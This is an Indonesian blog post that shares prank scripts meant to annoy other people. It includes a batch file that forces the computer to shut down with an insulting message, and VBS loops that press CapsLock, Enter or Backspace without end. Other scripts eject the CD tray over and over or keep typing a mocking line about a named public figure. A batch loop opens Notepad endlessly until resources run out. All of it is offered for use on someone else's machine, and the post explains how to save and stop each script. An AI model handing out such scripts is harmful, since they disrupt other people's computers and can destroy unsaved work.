program simple buat orang kuker
nih gw mau bagi-bagi script buat bikin program simple yang bisa buat orang kesel (tulis di notepad) .
cara matiin program nya kalo udah dijalanin : klik TaskManager - Process - baru end process yg nama nya wscript.exe
force shutdown
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Simpan dengan nama file terserah aja asal dengan format .BAT ,, type file : All File
Buat CapsLock nya nyala terus
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All FileBuat CD Drive komp buka tutup terus
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All FileTombol enter nya bakal kepencet terus
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All FileTulis "Hello, how are you? i am good thanks" secara slow motion (kata-kata "Hello, how are you? i am good thanks" bisa di ganti kok)
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All FileBuat Backspace nya nyala terus
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All FileBakal ketulis kalimat "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!."
secara terus menerus, dalam format pengetikan apapun .
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!."
loop
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All Fileprogram notepad nya bakal kebuka terus
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan dengan nama file terserah aja asal dengan format .VBS ,, type file : All File





0 Response to "program simple buat orang kuker"
Posting Komentar